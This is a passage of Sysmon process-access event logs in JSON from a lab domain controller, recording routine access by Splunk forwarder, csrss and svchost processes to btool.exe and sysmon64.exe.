--no-prompt ","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3438,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.532\r\nSourceProcessGUID: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nSourceProcessId: 2364\r\nSourceThreadId: 2176\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1FF5-5F25-0000-00106D760500}\r\nTargetProcessId: 3064\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18192|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.532","SourceProcessGUID":"{41C8662E-1FF4-5F25-0000-0010596B0500}","SourceProcessId":"2364","SourceThreadId":"2176","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1FF5-5F25-0000-00106D760500}","TargetProcessId":"3064","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18192|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3439,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.532\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF5-5F25-0000-00106D760500}\r\nTargetProcessId: 3064\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.532","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF5-5F25-0000-00106D760500}","TargetProcessId":"3064","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3440,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.532\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.532","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3441,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.532\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.532","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3442,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.532\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.532","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3443,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.532\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.532","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3444,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.532\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.532","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3445,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.532\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.532","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3446,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.532\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 